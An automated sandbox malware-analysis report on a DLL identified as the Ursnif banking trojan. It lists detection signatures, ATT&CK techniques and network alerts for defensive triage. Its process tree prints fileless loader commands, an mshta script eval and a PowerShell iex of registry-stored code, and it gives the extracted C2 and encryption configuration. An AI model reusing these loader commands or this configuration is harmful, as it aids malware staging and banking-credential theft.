Edit tour
Windows
Analysis Report
NdmYtW.xyiLj
Overview
General Information
| Sample Name: | NdmYtW.xyiLj (renamed file extension from xyiLj to dll) |
| Analysis ID: | 613876 |
| MD5: | f0f0659d9838d978a8b7e7391b81c801 |
| SHA1: | 6adf95dab8d012a85ee4ed93f970d610ea2138bc |
| SHA256: | f32f9fed2539cf3a6f585bc961035ccf3a03095c1f27e688f2da2811eca045f1 |
| Tags: | dll |
| Infos: |   |
 | |
Detection
Ursnif
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
loaddll32.exe (PID: 6884 cmdline: loaddll32. exe "C:\Us ers\user\D esktop\Ndm YtW.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938) 
cmd.exe (PID: 6900 cmdline: cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\Ndm YtW.dll",# 1 MD5: F3BDBE3BB6F734E357235F4D5898582D) 
rundll32.exe (PID: 6924 cmdline: rundll32.e xe "C:\Use rs\user\De sktop\NdmY tW.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 6356 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) 
WerFault.exe (PID: 7000 cmdline: C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 884 -s 604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 7088 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 884 -s 612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 4596 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 884 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
mshta.exe (PID: 5052 cmdline: C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Gbob='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Gbob).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) 
powershell.exe (PID: 5248 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name llst xy -value gp; new-al ias -name dtaagibhy -value iex ; dtaagibh y ([System .Text.Enco ding]::ASC II.GetStri ng((llstxy "HKCU:Sof tware\AppD ataLow\Sof tware\Micr osoft\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E").UrlsR eturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 2796 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6512 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\s5wot0w y\s5wot0wy .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6580 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES249.tmp " "c:\User s\user\App Data\Local \Temp\s5wo t0wy\CSC4A 66175C42A3 4DCCBF374A EBACAD802E .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 5992 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\0sg2urk r\0sg2urkr .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6104 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES23CB.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\0sg 2urkr\CSC9 E8D9CF5EFB 2455BAC85F 18857F6B83 6.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 684 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cleanup
{"RSA Public Key": "rM7U8h0H6XyHguKwe9if1a7N2/FMbudF6vIxc9cr6EC/ZxyH88ceq1sDzyjTgbcBMGvmPN0YcdpRxnebuQQLE3vAtHW2D9dfaEUpfJPWVhDRMv39NnfkoeGJw/DKTIS7SCwLstvvOgf2mhmdWsmtHCXwtcYZiWu8/BOeGK1BWWHiN/Ig8xejls7e4AIsWKVv4+0iV7nRKNKROI2Qs2vRdc6VR6tqxTeQ3FcxQqhTkNgnBHeF+EnzLo2cTMhoG9V16GNJW/rY0Nz2nqGVlgMhDYPyTdL4ybN77mlsw23BUmoUdB2vxx7aFOwbEJIw3SXQUMfs3KCDU3fRYvlDBVDr40UzsOF+1zKtZ4V9bCghne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| Click to see the 12 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| Click to see the 1 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth: | ||
| Source: | Author: Nikita Nazarov, oscd.community: | ||
| Source: | Author: Perez Diego (@darkquassar), oscd.community: | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Florian Roth: | ||
| Source: | Author: Florian Roth: | ||
| Source: | Author: Florian Roth: | ||
| Source: | Author: frack113: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): | ||
| Source: | Author: frack113: | ||
| Timestamp: | 04/22/22-15:43:57.871629 04/22/22-15:43:57.871629 |
| SID: | 2033203 |
| Source Port: | 49776 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
| Timestamp: | 04/22/22-15:44:19.124130 04/22/22-15:44:19.124130 |
| SID: | 2033203 |
| Source Port: | 49788 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
| Timestamp: | 04/22/22-15:44:20.140897 04/22/22-15:44:20.140897 |
| SID: | 2033203 |
| Source Port: | 49788 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
| Timestamp: | 04/22/22-15:44:18.311066 04/22/22-15:44:18.311066 |
| SID: | 2033203 |
| Source Port: | 49788 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
Networking | |
|---|
| Source: | Snort IDS: | ||
| Source: | Snort IDS: | ||
| Source: | Snort IDS: | ||
| Source: | Snort IDS: | ||
| Source: | Network Connect: | ||
| Source: | ASN Name: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
Key, Mouse, Clipboard, Microphone and Screen Capturing | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
E-Banking Fraud | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
System Summary | |
|---|
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | Static PE information: | ||
| Source: | Process created: | ||
| Source: | Binary or memory string: | ||
| Source: | Key opened: | ||
| Source: | ReversingLabs: | ||
| Source: | Static PE information: | ||
| Source: | Key opened: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Key value queried: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Classification label: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Section loaded: | ||
| Source: | Section loaded: | ||
| Source: | Section loaded: | ||
| Source: | Section loaded: | ||
| Source: | Section loaded: | ||
| Source: | Section loaded: | ||
| Source: | Section loaded: | ||
| Source: | Process created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | ||
| Source: | Window detected: | ||
| Source: | File opened: | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
Hooking and other Techniques for Hiding and Protection | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Registry key monitored for changes: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Process information set: | ||
| Source: | Thread sleep time: | ||
| Source: | Thread sleep time: | ||
| Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
| Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
| Source: | Thread delayed: | ||
| Source: | Thread delayed: | ||
| Source: | Window / User API: | ||
| Source: | Window / User API: | ||
| Source: | Window / User API: | ||
| Source: | Process information queried: | ||
| Source: | Thread delayed: | ||
| Source: | Thread delayed: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Process token adjusted: | ||
| Source: | Process queried: | ||
| Source: | Process queried: | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Network Connect: | ||
| Source: | Memory written: | ||
| Source: | Memory written: | ||
| Source: | Memory written: | ||
| Source: | Thread created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Queries volume information: | ||
| Source: | Key value queried: | ||
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
Remote Access Functionality | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 Windows Management Instrumentation | Path Interception | 412 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 412 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 11 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Rundll32 | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 31% | ReversingLabs | Win32.Trojan.Lazy | ||
| 100% | Joe Sandbox ML |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | URL Reputation | safe |
⊘No contacted domains info
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false |
| low | ||
| false |
| unknown | ||
| false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true |
| IP |
|---|
| 192.168.2.1 |
| Joe Sandbox Version: | 34.0.0 Boulder Opal |
| Analysis ID: | 613876 |
| Start date and time: 22/04/202215:42:24 | 2022-04-22 15:42:24 +02:00 |
| Joe Sandbox Product: | CloudBasic |
| Overall analysis duration: | 0h 11m 51s |
| Hypervisor based Inspection enabled: | false |
| Report type: | light |
| Sample file name: | NdmYtW.xyiLj (renamed file extension from xyiLj to dll) |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
| Number of analysed new started processes analysed: | 36 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 1 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Detection: | MAL |
| Classification: | mal100.troj.evad.winDLL@22/27@0/2 |
| EGA Information: |
|
| HDC Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
